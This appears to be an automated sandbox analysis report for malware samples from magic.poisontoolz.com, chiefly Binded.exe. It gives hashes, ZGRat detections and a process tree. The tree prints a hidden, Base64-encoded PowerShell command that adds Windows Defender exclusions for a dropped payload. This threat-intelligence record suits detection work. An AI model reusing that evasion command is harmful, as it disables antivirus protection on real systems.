Overview
overview
10Static
static
3magic.pois...lk.dat
windows10-2004-x64
3magic.pois...ed.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...cs.hta
windows10-2004-x64
10magic.pois...nt.pdf
windows10-2004-x64
1magic.pois...zg.wav
windows10-2004-x64
6magic.pois...pt.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...es.hta
windows10-2004-x64
10magic.pois...im.vdf
windows10-2004-x64
3magic.pois...ck.wav
windows10-2004-x64
1magic.pois...ff.dat
windows10-2004-x64
3magic.pois...IB.pdf
windows10-2004-x64
1magic.pois...pt.exe
windows10-2004-x64
10magic.pois...ty.wav
windows10-2004-x64
1magic.pois...ye.wav
windows10-2004-x64
6magic.pois...er.exe
windows10-2004-x64
10magic.pois...vw.mp4
windows10-2004-x64
6magic.pois...op.mp4
windows10-2004-x64
6magic.pois...ed.hta
windows10-2004-x64
10magic.pois...ng.exe
windows10-2004-x64
10magic.pois...wn.png
windows10-2004-x64
3magic.pois...ox.hta
windows10-2004-x64
10magic.pois...xw.exe
windows10-2004-x64
10magic.pois...xw.hta
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10Analysis
-
max time kernel
2s -
max time network
88s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
magic.poisontoolz.com/Avjteuhlk.dat
Resource
win10v2004-20231215-en
Behavioral task
behavioral2
Sample
magic.poisontoolz.com/Binded.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
magic.poisontoolz.com/Buildcrypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
magic.poisontoolz.com/Docs.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
magic.poisontoolz.com/Document.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral6
Sample
magic.poisontoolz.com/Evllmzg.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
magic.poisontoolz.com/File1crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral8
Sample
magic.poisontoolz.com/File2crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
magic.poisontoolz.com/Files.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral10
Sample
magic.poisontoolz.com/Jafxaspdhim.vdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
magic.poisontoolz.com/Otcck.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral12
Sample
magic.poisontoolz.com/Pphucxdmff.dat
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
magic.poisontoolz.com/RIB.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral14
Sample
magic.poisontoolz.com/RagCrypt.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral15
Sample
magic.poisontoolz.com/Spaufgty.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral16
Sample
magic.poisontoolz.com/Utsxokye.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
magic.poisontoolz.com/Walter.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral18
Sample
magic.poisontoolz.com/Wjwxkhbvw.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
magic.poisontoolz.com/Wlkubkwdmop.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral20
Sample
magic.poisontoolz.com/binded.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
magic.poisontoolz.com/building.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral22
Sample
magic.poisontoolz.com/down.png
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
magic.poisontoolz.com/fox.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral24
Sample
magic.poisontoolz.com/xw.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
magic.poisontoolz.com/xw.hta
Resource
win10v2004-20231215-en
General
-
Target
magic.poisontoolz.com/Binded.exe
-
Size
5.4MB
-
MD5
8f505e8ec6a2129264b6609d96e68962
-
SHA1
a4f8e2102645ad87b37c4de7fa45779d3bb70f18
-
SHA256
59e7180a2a869453fb54d13f04b4eda1a5153659378501fa31b18f862576f800
-
SHA512
49f4b191e7e7edfb29ebe9c40cc9dc1f57824aff6b166815d9a0bd46e3e883bbf74bccee95469116a522dc850ead3813fb2977b485ead64d37c680e9acb33396
-
SSDEEP
49152:tl+wZnx28ufF6eE39oRGIOVgdDll+wZnx28uf36eE39oRGIOVgdDp:
Malware Config
Signatures
-
Detect ZGRat V1 32 IoCs
Processes:
resource yara_rule behavioral2/memory/3892-39-0x00000000054A0000-0x0000000005588000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-41-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-43-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-58-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-60-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-64-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-70-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-75-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-82-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-121-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-127-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-137-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-133-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-131-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-129-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-125-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-123-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-119-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-117-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-113-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-90-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-72-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-68-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-66-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-56-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-54-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-50-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-48-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-46-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-40-0x00000000054A0000-0x0000000005582000-memory.dmp family_zgrat_v1 behavioral2/memory/2576-6754-0x0000000005580000-0x00000000056B6000-memory.dmp family_zgrat_v1 -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\blbrok.exe"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"2⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\rock.exe"C:\Users\Admin\AppData\Local\Temp\rock.exe"2⤵PID:2576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA1⤵PID:2168
-
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exeC:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe1⤵PID:3984
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵PID:2960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA1⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\nxryyws.exeC:\Users\Admin\AppData\Local\Temp\nxryyws.exe1⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\nxryyws.exeC:\Users\Admin\AppData\Local\Temp\nxryyws.exe2⤵PID:3560
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
66KB
MD506bf68af8360c9c6fe3ebd5f59c03495
SHA19149177f83ff4da16ab8bb9b77c94e5b55f3b454
SHA256fd9fd323b5934ecfc817a62a688a428bae61bbc80a12e43fe20637e9bfc47a50
SHA51295435c8c23b7c295fd08a0cd200c95d29183e5675a71f32ba6a6feba8bbee2ec8657d7364c97a46f6bf3fed404732898720768a56a48ece29ad8cd5b64266915
-
Filesize
51KB
MD5b436f694b4f5182e9f31c4eae47bb0fb
SHA13d0d136ec3e24c2dbc205b71770c6125effc8936
SHA25608206dcfb5782fa050ae2462abc8076fe4a72defb96db46c8bde9f6295746e79
SHA5127e2cda355d78dfe8f23a6709967c327f871628e6f9cff879d32adcd58dfde62963eca1c04cb442fd548ccc67b444b8a9329617d775504c3654c5910e12f7cfc9
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5c3941d9fa38f1717d5cecd7a2ca71667
SHA133b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA51298f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
234B
MD56be6fdca0cfa94635b8689b2b0bf2bee
SHA1379c61029b5443c3d3df7c770423e40618b36d15
SHA2565bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA5127955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8
-
Filesize
115B
MD5824ce7c07117a630e9b31638f89476aa
SHA12d012f1cd8b636de1662f69d213b3cf9fa5df846
SHA2564d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd
SHA5120c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945
-
Filesize
238B
MD50f5f7a38759e578c92bcf62c45d80b8a
SHA1211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA25639059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA5128130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d
-
Filesize
234B
MD5ae0f7fab163139c661e576fe0af08651
SHA17545ab94360fd93f2209021b4cecabb92592be27
SHA256832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b
-
Filesize
234B
MD5412ec159e4b14be1ca93db473e80acc2
SHA18909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4
-
Filesize
234B
MD536f6acc2229073f5bb4074cee73d1d5b
SHA1b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA2568a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD5c1fcd3f9800bbfb95a0e9c2cb7ca20b2
SHA1c65076ad5f65b7fe8e72cf7db2d0da7fe6d16d53
SHA2561b297af1fd0406ddf9f645636db79438761650b3d03adba24c2739d137fcaf14
SHA5124867f657c6d060308364310dc53eaad7835f8721cac5f1eaa965716859d5293aca31ed0bd55fa3266c76ad8298a872fa96e2717440438ec533d65072b82b31ce
-
Filesize
92KB
MD521656b2a4a4b65faff027532bd7f1504
SHA1957cf154d9447d2bb1498fab227b0ced0bf65d2c
SHA25649e25464f406c4df62df2ef15bebc68f36058d0feb9fae1ff60d6441d2528b36
SHA5127980929460c9d0d4eb453571b201b08e9db272b4bc3dad242b6d66cd4db066253bf25f6e1678094d170f24295c8eb5c9cf9930c5395e22fd15b102219541db91
-
Filesize
52KB
MD56fba0bc9d0671236ec252f7c5b014d57
SHA1ab4a0d7bd02e3c1d259553085214ae6f5dae3177
SHA2567c6c4ec6dbd68f2c0947cb46d6d3d4b091321c2209344332b59d97e177b6ca83
SHA5128b69836353df340a1df412e6e926d41c2e1a9d3cb2ae6cbf751f4d68990f1c92475492aab0ef52e364329303018a4e3999d4cae72de2ae9a13aa9af249783d43
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
20KB
MD50b97baabefc29ff0dffd2ccaab0a208f
SHA1aac9bed37cabfc6728ecd4d3d5e241c965071a0e
SHA256ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32
SHA51271a5712b119249a583b59688bb2e461cb7b320fd1575ed3fc8c5ced95b75405b7dab2194035d2a511ae9a6529968711c599942077efc3bece6d5f6ec1f6a48d9
-
Filesize
1KB
MD520431b8ed3a072f81845a821249a01af
SHA16f15694b5fde1fdec4674928226f45499522f141
SHA25656743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388
SHA512fa391aafbf5a81f868f1559e24ee040b5c0c7cf5be5e20669fdefbcc68daeae355899fe9723e245cd76d272ab0fce024896badc3002914264caf6ed031ece4fe
-
Filesize
43KB
MD5b5a9a31834ca48de5da58107f646a2a6
SHA118de389616225e3d740d288262a5c5bca5f11fc4
SHA25652df0926bf74c947e9959bd680421d47dab959a0fa12402127c7eb587b7a1d95
SHA512eeed1552481a59c748feb68f5d9d701e261d2e4bd250ecb399274b4f5bca8101a35520cf2891447ba3cdded40ceca70e546d3090abd1eaf979c0a16a661c566b
-
Filesize
157KB
MD5e483b733c95b33af0dc4257eeaf24ff2
SHA18e51b0545596abb59361dd71999524eebd481908
SHA256562bfea0a5e27bb37cfdcf26397989d7a1b48ee34dbe0ceeaf50c2a5b110791f
SHA5128db7cc418ffea771f6937e326bec01f86a48ddd1019998e6217d2d0cc532301b33a0a05aa6b377c7b9e549093dd95ca69a8bce9728223e8bb055d2d1ee640f83
-
Filesize
149KB
MD569e9f5b9e1c5ef06143471ae6022f996
SHA1fb74e045c41ef9fa9a11d3ec88ace82bb82f1729
SHA25670ba794963458cf9a8373869cf91aa234ecbdd596d2069237d1282718c3a68e7
SHA51257f75155c86a1079bfdc735a96c5ea6438e5227fc4e5b15ebd7fb329929a54e0d434700508700b1083d3fdc08a99b13c4e4cad9e33d621a6a8f4aaaa1272df87